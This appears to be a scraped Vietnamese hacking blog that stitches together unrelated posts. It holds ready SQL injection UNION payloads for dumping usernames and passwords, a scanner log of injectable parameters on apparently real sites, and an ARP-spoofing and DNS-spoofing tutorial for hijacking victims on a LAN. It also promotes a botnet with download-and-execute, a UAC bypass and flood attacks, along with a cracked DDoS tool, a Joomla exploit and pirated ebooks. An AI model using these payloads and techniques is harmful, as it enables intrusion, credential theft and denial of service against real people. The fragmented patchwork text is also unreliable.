Smart Hunter v.1.4.3 Public Version

Smart Hunter v.1.4.3 Public Version | Juno_okyo's Blog 
Smart Hunter v.1.4.3 Public Version | Juno_okyo's Blog

Download :


6 Random Injections

Mã: UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username, ​0x3b,password),5,6,7,8,9,10 from users_tbl--


Mã: UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1 ​9,20,21,22,23 from user_table--


Mã: UNION SELECT 1,2,group_concat(name,0x3b,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from users--


Mã: UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(email,0x3b, ​pwd,0x3c,0x62,0x72,0x3e),4 from users--


Mã: UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--


Mã: UNION SELECT group_concat(username,0x3b,kwort,0x3b,admin,0x3c,0x62,0x72,0x3e) from user--

Projects CEH 95MB


The Debian Administrator’s Handbook

[Hình: debian-liberation-cover.jpg]

The BackTrack Team is proud to have contributed 1000 EUR to the Debian Administrator’s Handbook liberation fund. This book, written by two Debian developers, is a welcome addition to any administrator’s bookshelf. Debian is very popular on servers and it’s also the base distribution from which BackTrack is forged.
Security is not in rest in this book since a full chapter is dedicated to the topic. It covers setting up a firewall, monitoring, intrusion detection systems, setting up SELinux policies, dealing with a compromised machine, and gives many thoughful advice to define a security policy within your organization.

The authors have pledged to release the book under an open source license if the associated “liberation fund” reaches 25,000 EUR. Today, there’s less than 3,000 EUR to raise and we invite you to contribute as well. By giving 10 EUR or more, you’ll get a copy of the ebook as soon as it’s available (even if the liberation fund is not completed). Click here to contribute now.

The book is planned to be released in April but in the mean time you can have a peek at a sample chapter and the full table of contents. We have no doubt that this book will provide a solid foundation to all those looking to better understand Debian, BackTrack and Linux at large.


Trích dẫn:

- Site lỗi SQL

Found :'11
Found :'1
Found :'2
Found :'135
Found :'42
Found :'92
Found :'13
Found :'87
Found :'40
Found :'snaps&id='fastach_clips
Found :'2
Found :'6
Found :'10
Found :'51
Found :'552
Found :'1
Found :'4
Found :'11
Found :'2
Found :'2
Found :'1
Found :'31
Found :'70-0-0-0
Found :'35
Found :'11&product_id='307
Found :'3&products_id='7
Found :'1
Found :'30
Found :'3
Found :'40
Found :'8
Found :'176
Found :'prod&id='115
Found :'1&page='0
Found :'13%26product_id='1062"target='"_blank'16"target='"_blank'8"target='"_blank'12"target='"_blank'MOSSCADE"target='"_blank'53"target='"_blank'25"target='"_blank'14"target='"_blank'16"target='"_blank'22"target='"_blank
Found :'238"target='"_blank'3%26product_id='2"target='"_blank'103"target='"_blank"target='"_blank'MD_600N"target='"_blank'floating-buddha"target='"_blank'6"target='"_blank
Found :'2"target='"_blank'27"target='"_blank'12KHS71"target='"_blank'46"target='"_blank'13%26product_id='1080"target='"_blank'cherry"target='"_blank'50"target='"_blank'22"target='"_blank'0504"target='"_blank'05"target='"_blank'40"target='"_blank'35"target='"_blank'3"target='"_blank'1%26product_id='1"target='"_blank'12"target='"_blank'3"target='"_blank'55"target='"_blank'3"target='"_blank'11"target='"_blank'1"target='"_blank'get_prod_id%26prod_id='2"target='"_blank"target='"_blank
Found :'5"target='"_blank'141"target='"_blank'2%26show_all='true"target='"_blank'5"target='"_blank'6"target='"_blank'cms/article%26path='2%26article_id='2"target='"_blank'194"target='"_blank'30"target='"_blank'4"target='"_blank'57"target='"_blank'72"target='"_blank'23"target='"_blank'187"target='"_blank
Found :'27%26section='1"target='"_blank'114%26action='detail%26id='73"target='"_blank
Found :'2%26id='19"target='"_blank'24"target='"_blank'44"target='"_blank'102"target='"_blank'102"target='"_blank"target='"_blank'1"target='"_blank'187"target='"_blank'17"target='"_blank'9"target='"_blank'1025"target='"_blank'SS%26pg='5"target='"_blank'1%26menu='DMY%2520Trunk%2520Series%26product_id='16%26s='prod.php"target='"_blank'5%26id_pkateg='20%26id='82"target='"_blank'7"target='"_blank'18"target='"_blank'3%26p_ac='show%26p='7"target='"_blank'NULL"target='"_blank
Found :'1"target='"_blank'105"target='"_blank
Found :"target='"_blank'1"target='"_blank
Found :'415%26path='459"target='"_blank
Found :'28"target='"_blank'AcousticSolid"target='"_blank'9"target='"_blank'313"target='"_blank
Found :'40"target='"_blank'564"target='"_blank'vehicle%26id='13"target='"_blank'9739"target='"_blank
Found :'3%26s_id='25"target='"_blank'14"target='"_blank'38%26action='detail"target='"_blank
Found :'198"target='"_blank
Found :'319"target='"_blank'00%26ID2='48"target='"_blank'139"target='"_blank
Found :'49%26prod_num='16"target='"_blank'8"target='"_blank'4"target='"_blank
Found :"target='"_blank'SP-295"target='"_blank"target='"_blank'9"target='"_blank'6"target='"_blank'216"target='"_blank'273%26storecategory_id='54"target='"_blank
Found :'1"target='"_blank'1"target='"_blank'12"target='"_blank'1"target='"_blank'12"target='"_blank'2"target='"_blank'59"target='"_blank'2"target='"_blank'59"target='"_blank'2"target='"_blank'77"target='"_blank'mini"target='"_blank'55"target='"_blank'subcategories%26cat_id='4"target='"_blank'HemiParts"target='"_blank'76"target='"_blank"target='"_blank'76"target='"_blank"target='"_blank
Found :
Found :'prod%26id='110"target='"_blank
Found :'1"target='"_blank'2417%26storecategory_id='29%26storesubcategory_id='6"target='"_blank'54"target='"_blank
Found :
Found :
Found :'prod%26id='11"target='"_blank
Found :'category%26id='52"target='"_blank'372"target='"_blank
Found :'43"target='"_blank'11%26pid='13"target='"_blank'43"target='"_blank'1"target='"_blank'1"target='"_blank'13"target='"_blank
Found :'5%26section='1"target='"_blank

Ebook Collection [Linux, Exploits, Networking, Programming]


Exploit Folder

  • Extreme Exploits - Advanced Defenses Against Hardcore Hacks
  • Hacking - The Art Of Exploitation
  • Shellcoder's Programming Uncovered
  • The Shellcoder's Handbook - Discovering And Exploiting Security Holes

Programming Folder

  • Hacker Disassembling Uncovered
  • Learning PHP & MySQL
  • Michael - Mastering UNIX Shell Scripting

C / C++
  • C By Example
  • C In a Nutshell
  • C Primer Plus, 5th Edition
  • C-C++ Programmer's Reference, 3rd Edition
  • Cryptography In C And C++
  • Effective C++, 3rd Edition
  • Optimizing C++
  • Programming Embedded Systems In C And C++
  • Secure Programming Cookbook For C And C++

  • Assembly Language Step-By-Step - Programming With DOS And Linux, 2nd Edition
  • Beginning Linux Programming
  • Burtch - Linux Shell Scripting with Bash
  • Glass,Ables - Linux for Programmers and Users
  • Guide To Assembly Language Programming In Linux
  • Korn Shell Unix and Linux Programming Manual,
  • Matthew - Beginning Linux Programming
  • Mitchell - Advanced Linux Programming
  • Wall - Linux Programming Unleashed

  • Advanced Perl Programming, 2nd Edition
  • Beginning Perl Web Development - From Novice To Professional
  • Intermediate Perl
  • Learning Perl Objects, References, & Modules
  • Learning Perl, 4th Edition
  • Minimal Perl For UNIX And Linux People
  • Perl Best Practices
  • Perl Hacks - Tips And Tools For Programming Debugging And Surviving
  • Perl Medic - Transforming Legacy Code

Hacking Folder

  • Hacker Linux Uncovered
  • Hacker's Delight
  • Hacker's Guide
  • Hacker's Handbook
  • Hackers_Secrets
  • Hacking Exposed - Network Security Secrets & Solutions, 2nd Edition
  • Hacking For Dummies
  • Honeypots - Tracking Hackers
  • The Art Of Intrusion - The Real Stories Behind The Exploits Of Hackers, Intruders, And Deceivers

  • Firefox Hacks - Tips & Tools For Next-Generation Web Browsing
  • Google Hacking For Penetration Testers
  • Google Hacks, 3rd Edition
  • Hacker Web Exploitation Uncovered
  • Web Hacking - Attacks And Defense

Networking Folder

  • Advanced Linux Networking
  • Hack The Stack - Using Snort And Ethereal To Master The 8 Layers Of An Insecure Network
  • OpenVPN - Building And Integrating Virtual Private Networks

  • Illustrated TCP-IP - A Graphic Guide To The Protocol Suite
  • Prentice Hall - Internetworking with TCP-IP, Volume I - Principles, Protocols and Architecture
  • Prentice Hall - Internetworking with TCPIP - Vol 3 Client-Server Programming and Applications for the BSD Sockets Version.
  • Tcp Ip For Dummies
  • TCP-IP Foundations (2004)
  • TCP-IP Network Administration,
  • TCPIPTools
  • Understanding TCP-IP
  • Unix Network Programming - Volume I - The Sockets Networking API,

  • Cryptography And Network Security,
  • Designing And Implementing Linux Firewalls And QoS
  • Firewall Policies And VPN Configurations
  • Fundamentals of Network Security
  • LANSecurity
  • Maximum Computer Security-A Hacker's Guide to Protecting Your Internet Site and Network
  • McGraw Hill - Hacking Exposed - Network Security, Secrets and Solutions, 3rd Ed
  • Network Security Assessment - From Vulnerability To Patch
  • Network Security Hacks - 100 Industrial-Strength Tips & Tools,
  • Network Security With OpenSSL
  • Self-Defending Networks - The Next Generation Of Network Security

Unix Folder

  • Absolute BSD - The Ultimate Guide To FreeBSD
  • Absolute OpenBSD - Unix For The Practical Paranoid
  • Embedded FreeBSD Cookbook (2002)
  • Learning the UNIX Operating System
  • Mastering FreeBSD And OpenBSD Security
  • SysAdmin - Security Tools in FreeBSD
  • Teach Yourself FreeBSD In 24 Hours
  • The Complete FreeBSD, 4th Edition
  • The OpenBSD 4.0 Crash Course
  • Unix Power Tools, 3rd Edition

  • linuxKernelSux
  • OReilly.Understanding.The Linux Kernel 1st Edition
  • Understanding The Linux Kernel, 3rd Edition

  • A Practical Guide To Linux Commands, Editors, And Shell Programming
  • Get_Acquainted_with_Linux_Security_and_Optimizatio n_System
  • Hack Proofing Linux - A Guide To Open Source Security
  • Linux Basic Commands
  • Linux Kernel Development, 2nd Edition
  • Linux Kernel module programming guide 1
  • Linux Shell Scripting With Bash (2004)
  • Linux_Administration_Made_Easy
  • Linux_Administrators_Security_Guide
  • McGraw.Hill.HackNotes.Linux.and.Unix.Security.Port able.Reference.eBook-DDU
  • OReilly - Linux_Network_Administrator's_Guide_Second_Edition
  • Sam teach you Linux in 24 hours
  • Securing Linux A Survival Guide for Linux Security Version 1.0 2003
  • Securing Linux Servers for Service Providers
  • SELinux (2004)

  • shell-scripting
  • tcsh
  • Unix Shell Programming, 3rd Edition (2003)

SQL Folder

  • Mastering_MySQL_4.2003.Sybex
  • MySQL - 2nd Edition (Sams)
  • MySQL - Essential Skills (2004)
  • MySQL - Visual QuickStart Guide, 2nd Edition (2006)
  • MySQL Certification Study Guide (2004)
  • MySQL Cookbook (2002)
  • MySQL Cookbook
  • MySQL Pocket Reference (2003)
  • MySQL Tutorial (2003)
  • MySQL.PHP.Database.Applications
  • SQL - A Beginner's Guide, 2nd Edition (2003)
  • SQL - Practical Guide For Developers (2005)
  • SQL Bible (2003)
  • SQL Cookbook (2005)
  • SQL For Dummies, 6th Edition (2006)
  • SQL Sams Teach Yourself MySQL in 21 Days -- SAMS
  • SQL Server 2000




Mất ngủ dậy sớm làm cái tut SQL dạng HTMl cho anh em

Link Download



Thủ thuật phá phách trong mạng LAN

Chuẩn bị :
_ Backtrack 5 R3 (cái này cài lên máy ảo cho dễ xài.

_ Trên windows các bạn có thể dủng cain & abel để làm điều tương tự nhưng có thể ko linh động bằng
Link download BT :

_ Kết nối mạng LAN (tất nhiên )
_ Victim (cái này hơi thừa )

Phương pháp:

_Phương pháp là mình sử dụng có tên là Man-in-the-middle (MITM), phương pháp này rất hữu dụng và nguy hiểm cho người khác nếu attacker sử dụng giỏi. Bạn có thể :

+ Lấy được thông tin gửi đi từ máy victim (ID:pass, cookie, URL...)
+ Kiểm soát toàn bộ về mạng của victim, nói chung là ta làm chủ mạng.
Trong bài này mình sẽ hướng dẫn cách redirect mạng victim

Giới thiệu về MITM:

Trong bài viết này giả sử ta có 1 mạng LAN với :

Router ( IP:
Attacker ( IP:
Victim ( IP:

Lưu ý : các bạn muốn tìm được IP của victim thì sử dụng các chương trình scan mạng sẽ thấy hoặc sử dụng Nmap có sẵn của Backtrack ( hướng dẫn ở cuối bài )

Nguyên lý ở đây là ta sẽ mạo danh thành :
+ Đồi với máy victim : ta giả làm router
+ Đối với router : ta giả làm máy victim
Sơ đồ :
Bình thường :

Router <==> Victim
\ /


Router <==> Attacker <==> Victim

Thực hiện:

Toàn bộ các bước sau đều thực hiện trong Terminal của Backtrack !!!

Đầu tiên ta port forward IP để không DOS mạng LAN do sự cố ( cái này mình chưa bị lần nào nhưng cứ cẩn thận vẫn hơn)


echo 1 > /proc/sys/net/ipv4/ip_forward

[Hình: 2.png]

Sau đó ta gõ :

+ Trường hợp 1 ( biết được IP victim và nhắm tới chỉ 1 victim đó thôi ):


arpspoof -i <interface> -t <victim ip> <router ip>

[Hình: 3.png]

mở terminal khác và gõ :


arpspoof -i <interface> -t <router ip> <victim ip>

[Hình: 4.png]

+ Trường hợp 2 ( nhắm đến toàn mạng ):

arpspoof -i <interface> <router ip>

Trường hợp 2 mọi người nhớ cẩn thận nếu như nhiều người trong mạng quá có thể gây DOS.

Redirect :

Sau khi hoàn thành bước MITM ta tiếp tục đến phần phá phách :

Mình sẽ sử dụng phương pháp DNS Spoofing để redirect victim qua những web site do ta định sẵn :

Đầu tiên ta tạo 1 file txt, trong đó ta gõ theo cú pháp :

<ip> <website>

với <ip> là IP của website mà ta muốn redirect victim đến, <website> là những website mà khi victim truy cập sẽ bị redirect sang web của ta.
Ví dụ: ( redirect vào localhost )
-hoặc- ( khi victim vào sẽ bị chuyển qua

ta có thể sử dụng dấu * như 1 cách "bao gồm toàn bộ", chẳng hạn: www.*.com (toàn bộ trang web bắt đầu bằng www và kết thúc bằng .com sẽ bị chuyển hướng)

Sau khi ta tạo file text, ta mở Terminal khác và gõ :


[code]dnsspoof -i <interface> -f <đường dẫn đến file txt mới tạo>

[Hình: 6.png]

Và sau đó ta ngồi chờ và xem kết quả.
<<----KẾT THÚC---->>

<interface> : là card mạng sử dụng(thông thường là eth0 hoặc wlan0 nếu như sử dụng wifi). Các bạn có thể check với câu lệnh:


[Hình: 1.png]

Hướng dẫn Scan IP:

Bạn mở Terminal lên và gõ :

nmap -T4 -O <ip>/24

Trong đó:
-T4 : chọn scan IPv4
-O : chọn scan hệ diều hành

Ví dụ: IP nhà mình bắt đầu bằng thì ta gõ :

nmap -T4 -O

lưu ý là ta gõ số 0 ở bit cuối cùng của IP, thay cho xxx. "/24" là prefix, cứ gõ nó vào dể scan toàn bộ mạng.

Kết quả là bạn sẽ nhận được 1 list IP trong mạng và hệ điều hành, nếu scan được.

Cách hóa giải khi làm xong :

Phía Attacker:
Ở mỗi Terminal bấm Ctrl+C để terminate, chương trình sẽ tự động set lại các giá trị.

Phía Victim:
Đợi 5 phút
Start-Run-Cmd :



Hướng dẫn config card mạng cho Virtual Box để sử dụng ==> Phải đọc<== (lý do là nếu không config mà để mặc định thì khi tấn công máy victim sẽ mất kết nối internet):

[Hình: Screenshot+%282%29.png]

Chọn Setting

[Hình: Screenshot+%283%29.png]

Nhấp vào thẻ Network
Ở mục "Attach to :" chọn "Bridged Adapter" rồi chọn card mạng đang sử dụng.

[Hình: Screenshot+%284%29.png]


Link download Backtrack 5 R3 :

[ Share ] Code Bán Thẻ Online

Code cũng nhẹ không nặng lắm . cho các bạn nào thích l

Thanks giùm e để qa đợt thaNH lọc nha
Pass : Tommie

[OPEN SOURCE] vnLoader - HTTP Bot - DL/Exec, Update, Visit - [UDP | HTTP Flood] [VB6]

[Image: logoxx.png]

Hey guys!
I'm presenting my HTTP Bot called 'vnLoader' i was coding it about 1 year ago for a couple of months. I don't use it anymore so I gonna share this with you.
It only lays around on my computer. So why not giving something to the community.

About the Bot:
  • Coded in VB6
  • Startup (of course)
  • Mutex (of course)
  • Copy & Paste UAC Bypass
  • Commands:
    • Download & Execute
    • Update
    • Remove
    • Visit Website (visible/hidden)
    • UDP Flood
      > attacks random ports
    • HTTP Flood
      > if server is vulnerable to Slowloris -> Slowloris attack
      > else -> HTTP Get Flood
  • Uses Sockets to connect!
About the Webpanel:
  • Coded in PHP ( + a bit Javascript )
  • High customizable taskcreation
  • Statistics, Botlist, Tasklist, etc.
  • Account system (take a look at the picture below)

Screenshots of the Webpanel:
How to install the Webpanel:
  • 1. Create a mysql database (won't explain how that works)
  • 2. After downloading the source browse to your php files.
  • 3. Open "" and configure it to your mysql server/database
    PHP Code:
  • 4. Upload everything to your webserver
  • 5. Browse in your Internet Browser to
  • 6. Enter a username and a password for your webpanel and click "Install". Wait until the script is done.

How to compile the bot:
  • 1. Open the project in your Visual Basic 6.0 IDE
  • 2. Search for "Form_Load" in Form1
  • 3. Configure it like this.

    Server = ""  'Your Domain (without: "http://" or "www.")
    Prefix = "/vnLoader/"  'Path to the folder of the webpanel
    Password = "updateandremovepassword"    'Password for the update command
    Mutex = "Something Random Here"  'Mutex
    StartUp = "Startupkey"    'Startupkey
  • 4. Compile
  • 5. ???
  • 6. Profit

Enjoy anyone (:
If you have questions ask here in thread, do not PM me since PM limit is 50, wich is reached fastly.
Also search in the thread if you have problems. Maybe someone already solved them :b

Ahhh, by the way what i almost missed.
I'm not responsible for what you do with this :P


DaRKDDoSeR 5.6c Cracked 


Share tài liệu mạng IT - Part 3

I/ Tài liệu đợt 3 :
Link download tại đây:
Pass download :longbaoitc

II/ Nội dung:
Gồm 2 phần
- 1 là Data3 : chứa các kiến thức về ngôn ngữ SQL (dưới dạng video) và kiến thức về môn mạng băng rộng (Frame Relay, DSL, Optical...), đây là 1 môn khó nhai vì là lý thuyết chay nên mình đã lồng vào đó 1 số đoạn flash animation dùng để minh họa cho dễ hiểu...
- 2 là Video Hack: trong đây chứa 1 ít các video hack về ứng dụng web với nhiều dạng hack khác nhau như: SQL Injection, Blind SQL Injection, Hack thông qua file download và upload, Phising Attack, Local Attack..v...v...(trong các đợt share trước các video hết 50% là do mình tự làm nhưng các video trong lần này là mình sưu tầm nguồn từ trên mạng nhé nhưng đã qua chọn lọc kỹ càng...nên các bạn có thể yên tâm về chất lượng nhé.)

Hình ảnh minh họa cho môn mạng băng rộng
[Hình: mangbangrong.jpg]
==>Link download tài liệu CEH Full Tiếng Việt + Mạng - IT Đợt 1 và 2 tại đây (dành cho bạn nào chưa đọc bài của mình nhé...)
Đợt 2:
Đợt 1:
CEH - Tiếng Việt: 
Pass download: longbaoitc

và đây chắc cũng là đợt share cuối cùng về mảng kiến thức mạng nhé, những bộ tài liệu mình post đã tập hợp gần hết các kiến thức cơ bản của dân mạng cần có, tuy không nhiều nhưng cũng là những tài liệu quí giá được biên soạn lại thành các video cho các bạn dễ hiểu nhất...

Joomla Exploit (Code)

In this video you will learn how to hack joomla
Note:- This exploit only works on old version of joomla

Download and open the below file in your browser 

Open it and edit it with your Username & Pass

Note:- you need to put different pass here password should not match

Follow the video for proper guidance and do the steps

Decode PHP lockit encoded script


2. NOTEPAD ++ 



Ebook SQLI


Share tài liệu chuyên ngành Mạng - IT - Part 2

Share tài liệu chuyên ngành Mạng - IT - Part 2

I/ Giới thiệu:
Tiếp theo bộ tài liệu được share đợt 1. Hôm nay mình sẽ share cho các bạn bộ tài liệu đợt 2 này.
II/ Nội dung:
Nội dung của tài liệu bao gồm: các đề thi mẫu về môn Linux, các đồ án của chuyên ngành mạng (bao gồm file word, slide báo cáo và demo), 1 cuốn ebook về lắp ráp laptop, và cuối cùng là các bài lab về quản trị mạng windows server 2k8.
Một vài hình ảnh trong bộ tài liệu này
[Hình: 1-3.jpg]
Các bài lab quản trị mạng 2k8 (tiếp theo của đợt 1 là về 2k3 )
[Hình: 2-2.jpg]
Đồ án chuyên ngành mạng (Trong này có đồ án "OpenVPN - Linux là do mình làm ...^^") 
[Hình: 3-2.jpg]
Giáo trình lắp ráp máy tính laptop
[Hình: 4-2.jpg]

III/ Link download
Link đợt 1:
Link đợt 2:
Password để download: longbaoitc
==>Các bạn download rồi dùng phần mềm "HJ Split để nối file nhé"


Copyright © Dương-UG Blog's - Nguyễn Bình Dương